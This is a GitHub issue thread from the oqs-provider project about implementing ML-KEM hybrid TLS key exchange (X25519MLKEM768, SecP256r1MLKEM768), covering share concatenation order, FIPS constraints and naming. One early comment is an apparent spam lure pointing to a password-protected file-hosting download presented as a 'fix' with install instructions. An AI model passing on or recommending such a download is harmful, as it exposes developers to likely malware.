### ISSUE TITLE
Implement new ML-KEM hybrid key exchange in TLS

### ISSUE THREAD

**Issue by dstebila** [open-quantum-safe/oqs-provider#503]
The new code points for ML-KEM hybrid key exchange in TLS are now available in https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/

Note that order of concatenation has changed since previous drafts.

Depends on https://github.com/open-quantum-safe/liboqs/pull/1899

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by baentsch** [comment]
Thanks for the heads-up, @dstebila 

> Note that order of concatenation has changed since previous drafts.

Is your suggestion then to adapt this in the implementation generally (if I get it right, breaking all interop with old releases, i.e., assigning new code points/OIDs to all algorithms) or just for ML-KEM (minimizing the breakage with old code)?

**Comment by beldmit** [comment]
https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/ seems to be not adopted by TLS WG yet. 
And, even more, it's probably worth using p384 curve as a part of specification.

+ @tomato42

**Comment by tomato42** [comment]
@dstebila I might have missed it, but when do you plan to raise it for discussion on the IETF TLS mailing list?

**Comment by bhess** [comment]
The order of the shares seem to be inconsistent between X25519MLKEM768 and SecP256r1MLKEM768 in https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/01/:

"When the X25519MLKEM768 group is negotiated, the client's key_exchange value is the **concatenation of the client's ML-KEM-768 encapsulation key and the client's X25519** ephemeral share."

and 

"When the SecP256r1MLKEM768 group is negotiated, the client's key_exchange value is the **concatenation of the secp256r1 ephemeral share and ML-KEM-768** encapsulation key."

The same for "server share" and "shared secret".

Is this intentional @dstebila ?

**Comment by dstebila** [comment]
> > Note that order of concatenation has changed since previous drafts.
> 
> Is your suggestion then to adapt this in the implementation generally (if I get it right, breaking all interop with old releases, i.e., assigning new code points/OIDs to all algorithms) or just for ML-KEM (minimizing the breakage with old code)?

I wouldn't change the order in any of the previous hybrids we have, so it would just be for the ML-KEM code points in this document.

**Comment by dstebila** [comment]
> https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/ seems to be not adopted by TLS WG yet. And, even more, it's probably worth using p384 curve as a part of specification.
> 
>     * @tomato42

> @dstebila I might have missed it, but when do you plan to raise it for discussion on the IETF TLS mailing list?

Kris Kwiatkowski is leading that document and I assume will be notifying the TLS mailing list about it shortly. The TLS WG chairs prompted for this so they are aware of it.

**Comment by dstebila** [comment]
> The order of the shares seem to be inconsistent between X25519MLKEM768 and SecP256r1MLKEM768 in https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/01/:
> 
> "When the X25519MLKEM768 group is negotiated, the client's key_exchange value is the **concatenation of the client's ML-KEM-768 encapsulation key and the client's X25519** ephemeral share."
> 
> and
> 
> "When the SecP256r1MLKEM768 group is negotiated, the client's key_exchange value is the **concatenation of the secp256r1 ephemeral share and ML-KEM-768** encapsulation key."
> 
> The same for "server share" and "shared secret".
> 
> Is this intentional @dstebila ?

Yes.  Apparently [NIST SP 800-56Cr2](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-56Cr2.pdf#page=10) is written so as to require the concatenation method place FIPS-approved keying material first, followed by auxiliary keying material. Since X25519 is not FIPS-approved, in order for X25519MLKEM768 to be FIPS-approvable, one would have to put the FIPS-approved algorithm (ML-KEM 768) first, and the non-FIPS approved algorithm second (X25519).  Whereas for SecP256r1MLKEM768, since both are FIPS-approved, either can go first, and past codepoints had the ECC algorithm go first, so that's being maintained.

**Comment by dstebila** [comment]
> Thanks for the background @dstebila.
> 
> So to avoid much custom logic, the following rule should apply, right?
> 
>     * If the PQ algorithm is FIPS-approved and the classical algorithm is not FIPS approved -> PQ share is first in the concatenation
> 
>     * Otherwise -> Classical share is the first in the concatenation

That is the logic employed in draft-kwiatkowski-tls-ecdhe-mlkem. That being said, many of our existing hybrids start with a non-FIPS-approved algorithm like x25519 or x448, and I don't think we should go through the effort of changing all those -- no one's trying to get those FIPS-approved, they're just for prototyping/experimentation.

**Comment by bhess** [comment]
> That is the logic employed in draft-kwiatkowski-tls-ecdhe-mlkem. That being said, many of our existing hybrids start with a non-FIPS-approved algorithm like x25519 or x448, and I don't think we should go through the effort of changing all those -- no one's trying to get those FIPS-approved, they're just for prototyping/experimentation.

I agree, and the rule above would also capture these existing hybrids.

**Comment by dstebila** [comment]
> > I wouldn't change the order in any of the previous hybrids we have, so it would just be for the ML-KEM code points in this document.
> 
> Hmm, I'm a bit concerned about the additional code complexity this special treatment adds (and I don't like code complexity, particularly in security software). Wouldn't it be (implementation and also security wise) more sensible to change the order for all algorithms? Does the spec prohibit this? What otherwise speaks against this given
> 
> > they're just for prototyping/experimentation.
> 
> ?

It's true we don't make any promises about stability of these across releases, but it still seems courteous to our users to avoid changes if it's not too difficult. How much extra logic would be needed to keep the current order for our current hybrids but also accommodate the reversed order for the one new hybrid?

**Comment by baentsch** [comment]
> How much extra logic would be needed to keep the current order for our current hybrids but also accommodate the reversed order for the one new hybrid?

I'm not sure that is a fair question to ask: We currently have absolutely no algorithm-specific code in oqsprovider exactly for the reason to make the code easy(er) to defend, understand, e.g., by third parties assessing it, and test.

Any "special code" goes against this primary goal. It will require extra testing, extra documentation, etc beyond just the algorithm-specific extra logic you're asking for. I'm all for courteousness, but should it trump [security goals](https://github.com/open-quantum-safe/oqs-provider/issues/483)?

I totally would subscribe to your view if we'd agree to retain the original OQS mission, but this is not what the [next goal seems to be](https://github.com/PQCA/TAC/issues/44).

Whichever way the discussions in the links above go, allow me thus to repeat my question to gauge options:

> Does the spec prohibit this?

**Comment by dstebila** [comment]
> > How much extra logic would be needed to keep the current order for our current hybrids but also accommodate the reversed order for the one new hybrid?
> 
> I'm not sure that is a fair question to ask: We currently have absolutely no algorithm-specific code in oqsprovider exactly for the reason to make the code easy(er) to defend, understand, e.g., by third parties assessing it, and test.

Could we accomplish this without algorithm-specific code? For example by extending the `mix_with` data structure in generate.yml to allow the order of hybridization to be specified?

> > Does the spec prohibit this?

[draft-ietf-tls-hybrid-design](https://datatracker.ietf.org/doc/draft-ietf-tls-hybrid-design/) doesn't prohibit this.  

[draft-kwiatkowski-tls-ecdhe-mlkem](https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/01/) will require that X25519MLKEM768 has ML-KEM first, but that SecP256r1MLKEM768 has ECC first.

**Comment by dstebila** [comment]
Code points for TLS [have now been defined by IANA](https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-8) for `SecP256r1MLKEM768` and `X25519MLKEM768`

**Comment by baentsch** [comment]
https://github.com/open-quantum-safe/liboqs/issues/1915#issuecomment-2334664689 indicates an entity's interest to implement X25519MLKEM768 -- which according to the logic above should already work with the current code base as soon as we simply update the code point(s) in configure.yml: https://github.com/open-quantum-safe/oqs-provider/blob/2cdbc17e149cc7fda3fdd8c355a49581625acbad/oqs-template/generate.yml#L171

with the value 4588 from https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-8

**Comment by baentsch** [comment]
> which according to the logic above should already work with the current code base

oops -- my bad: x25519-mlkem768 exactly requires a change of order while p256-mlkem768 should be OK with the current code base, right?

**Comment by dstebila** [comment]
> > which according to the logic above should already work with the current code base
> 
> oops -- my bad: x25519-mlkem768 exactly requires a change of order while p256-mlkem768 should be OK with the current code base, right?

Right.

**Comment by baentsch** [comment]
@dstebila if I'm not totally mistaken, @bhess agreed to take this algorithm-specific order reversal on, right?

**Comment by dstebila** [comment]
> @dstebila if I'm not totally mistaken, @bhess agreed to take this algorithm-specific order reversal on, right?

Yes, I just assigned this issue to him in Github.

**Comment by baentsch** [comment]
> Yes, I just assigned this issue to him in Github.

No, you assigned it to me. I switched it over. This just to check I didn't misunderstand.

**Comment by dstebila** [comment]
> > Yes, I just assigned this issue to him in Github.
> 
> No, you assigned it to me. I switched it over. This just to check I didn't misunderstand.

Oh gosh, you're right. Sorry.  Apparently I can only handle one "b" username.

**Comment by ghen2** [comment]
> x25519-mlkem768 exactly requires a change of order while p256-mlkem768 should be OK with the current code base, right?

Does it make sense to reverse the name then, [like Mozilla did](https://bugzilla.mozilla.org/show_bug.cgi?id=1918484): mlkem768x25519 ?

Perhaps also the to-be standard naming in draft-kwiatkowski-tls-ecdhe-mlkem.

**Comment by baentsch** [comment]
> > x25519-mlkem768 exactly requires a change of order while p256-mlkem768 should be OK with the current code base, right?
> 
> Does it make sense to reverse the name then, [like Mozilla did](https://bugzilla.mozilla.org/show_bug.cgi?id=1918484): mlkem768x25519 ?
> 
> Perhaps also the to-be standard naming in draft-kwiatkowski-tls-ecdhe-mlkem.

That's actually a good idea, @ghen2 -- the only "risk" I see in this is a bit of confusion: We currently use "postfix classic crypto" naming for composite algs and prefix for hybrid. But then again, if Mozilla does this, that'd be a _very good_ rationale to follow suit. Objections anyone?

**Comment by t-j-h** [comment]
I'd tend to stick with the actual naming used in the specification at https://datatracker.ietf.org/doc/draft-kwiatkowski-tls-ecdhe-mlkem/ rather than reflecting the field ordering in the naming which is more of an implementation detail.

**Comment by bwesterb** [comment]
Both orders are confusing

- The present order is confusing for those that implement the key agreement..
- The reverse order is confusing to those that need to pick which key agreement to us, as it doesn't align with the existing X25519Kyber768, SecP256r1MLKEM768, SecP256r1MLKEM768.

As there are many more of the latter than the former, the present order makes more sense.

Google/Chrome used the [present order](https://github.com/google/boringssl/blob/d9ad235cd8c203db7430c366751f1dddcf450060/ssl/ssl_key_share.cc#L384).

**Comment by pi-314159** [comment]
@bhess @dstebila 

I think we also need to update `x25519_mlkem512` and `x448_mlkem768`. It might be easier to revise the order of all hybrids involving `x25519` or `x448` (such as `x25519_bikel1`) rather than focusing solely on the mlkem variants. This approach simplifies the implementation: we can simply check if the classical algorithm is `x25519` or `x448`. If it is, we place pq-algs first; otherwise, x25519/x448 comes first. This method eliminates the need to modify generate.yml or add algorithm-specific code (like mlkem).

**Comment by baentsch** [comment]
Changing the order of all 'x' hybrids sounds sensible given that CF and Google seem to terminate support for the Kyber x-hybrid... So why should oqsprovider keep supporting this?

**Comment by t-j-h** [comment]
The updated openssl code for tracing that is in master shows the new allocated ids as [X25519MLKEM768 ](https://github.com/openssl/openssl/blob/0fdf965bf0b1f87d4a5d52c71994ffdda5235718/ssl/t1_trce.c#L551) and [SecP256r1MLKEM768](https://github.com/openssl/openssl/blob/0fdf965bf0b1f87d4a5d52c71994ffdda5235718/ssl/t1_trce.c#L551) which matches the specification wording (and remains consistent with the Kyber draft naming usage) so leaving the order matching rather than changing it seems consistent and logical.

An outcome where oqs_provider has a different name than what the trace in openssl itself uses would be confusing.

**Comment by baentsch** [comment]
@t-j-h my suggestion above only pertained to the implementation as per suggestion by @pi-314159 , not the name. Keeping the order in naming is majority agreed, I'd say.

**Comment by baentsch** [comment]
@bhess fwiw, we should then also follow the names verbatim (capitalization, no dashes)--which requires significant changes to the jinja2 logic I'm afraid...

**Comment by pi-314159** [comment]
@baentsch @bhess 

I've made a commit that reverses the order of **all** hybrids involving `X25519` in a new BoringSSL branch (note that BoringSSL doesn’t support X448). You can view the commit here: https://github.com/open-quantum-safe/boringssl/commit/c1a84f79fcae3926e221e13986bb9b6f3c627a7a.
I tested it with Google's implementation.

Regarding the naming: I didn't change the order in names.

**Comment by dstebila** [comment]
FYI here is Google's post describing their plan for transitioning hybrid to ML-KEM: https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html

**Comment by ghen2** [comment]
> It might be easier to revise the order of all hybrids involving `x25519` or `x448` (such as `x25519_bikel1`) rather than focusing solely on the mlkem variants. This approach simplifies the implementation: we can simply check if the classical algorithm is `x25519` or `x448`

But that means it will not be possible for servers to (temporarily) support both `x25519_kyber768` (`0x6399`) and `x25519_klkem768` (`0x11ec`) at the same time to ease client transition, as they need a different order?

(for clients it's more expensive to support both at the same time, so Chrome and Firefox will switch directly from one to the other.)

**Comment by pi-314159** [comment]
@ghen2 I don't think that's a problem because 
1. there's no promise about stability of these releases
2. you can always use p256_kyber768
3. if you really need 0x6399 and 0x11ec, try OQS-BoringSSL (e.g., nginx-quic and curl-quic, they're built with OQS-BoringSSL). But keep in mind that 0x6399 in BoringSSL will be removed when Google removes them.

**Comment by ghen2** [comment]
It's only for the –most likely very short– transition period from kyber hybrids to mlkem hybrids.  (I don't think anyone will still support `x25519_kyber768` in 2025?)
But if it implies code complexity to support both, it's indeed better to just drop support for the deprecated drafts, and focus solely on the standard variants.

**Comment by baentsch** [comment]
> if it implies code complexity to support both, it's indeed better to just drop support for the deprecated drafts, and focus solely on the standard variants.

fwiw, that's indeed my preference.

**Comment by baentsch** [comment]
Reopening as we only updated some code points in #511 but not the x-hybrid ones (let alone implement it).

**Comment by baentsch** [comment]
@bhess what's your time availability to close this out for good? I personally think we cannot do a new `oqsprovider` release following the `liboqs` release without including this: I'd think it'd confuse people significantly: If the final MLKEM is supported why does one corresponding (x25519-)hybrid fail to interoperate? Other opinions (or helping hands) welcome!

**Comment by bhess** [comment]
I started working on it and plan to do a PR this week.

**Comment by baentsch** [comment]
Again incorrectly closed.

**Comment by baentsch** [comment]
Reminder to re-activate interop testing with CF as part of PR as per https://github.com/open-quantum-safe/oqs-provider/blob/main/scripts%2Foqsprovider-externalinterop.sh#L31-L32

**Comment by baentsch** [comment]
Lots of time has passed since this issue got closed: X25519MLKEM768 is implemented afaik in all major crypto libraries by now, so I think this issue is dealt with. If you're looking for an "official approval" my suggestion is you check with NIST and/or IETF, @secure12.
